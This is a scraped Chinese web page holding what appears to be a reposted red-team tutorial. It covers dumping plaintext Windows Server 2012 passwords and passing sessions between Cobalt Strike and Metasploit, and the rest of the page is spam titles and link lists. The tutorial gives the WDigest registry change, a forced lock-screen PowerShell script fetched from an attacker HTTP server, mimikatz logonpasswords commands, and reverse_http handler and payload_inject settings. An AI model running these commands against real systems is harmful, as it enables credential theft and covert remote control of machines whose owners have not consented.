当前位置: 首页 > news >正文

中文网站建设代码网站项目开发流程

中文网站建设代码,网站项目开发流程,wordpress邮箱非必填,dw静态网页制作cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.yayakq.cn/news/222150/

相关文章:

  • 中阔浩潮建设工程有限公司网站各省施工备案网站
  • 网站开发模块学些什么软件织梦网站文章发布信息模板下载
  • 怎样克隆别人的网站网站制作外包公司
  • 嘉兴网站平台建设linux7 下载wordpress
  • 一个ip地址上可以做几个网站兰州seo实战优化
  • 手机网站建设最新报价wordpress需要调用缩略图
  • ppt代做网站seo排名优化软件
  • 常州建站服务wordpress主题 html5
  • 四川住房建设厅网站增项查询郑州厉害的seo顾问公司
  • 广州网站整站优化wordpress怎么分享到微信支付
  • 怎么注册一个自己的网站揭阳网站制作软件
  • 晋江文创园网站建设高端企业站
  • 智能网站建设制作药厂网站建设
  • 四川网站建设报价小程序代理加盟有哪些大品牌
  • 怎样下载别人网站自己做的视频上传html到wordpress
  • 在百度上怎么建立网站怎么设置wordpress头像
  • 游戏网站开发推广计划书阿里云域名注册查询官网
  • 沈阳网站开发工程师招聘网网站创建服务
  • 网站做的好看的任县网站建设价格信息
  • 安徽建设银行官方网站海南网页设计公司排名
  • 建设综合信息网站需要多少钱资源网站
  • 柳州网站制作工作室手机网站个人中心源码
  • 廊坊网站建设维护网站做微信链接
  • 做网站的相关教程搜索推广竞价托管哪家好
  • windows 网站开发环境wordpress 代码大全
  • 网站中的flash官方重大项目建设库网站
  • 贷款网站模板做网站源代码需要买吗
  • 网站不想让百度收录公众号开发菜单
  • 什么电商平台免费开店seo体系网站的建设及优化
  • 手机特殊网站做网站开发钱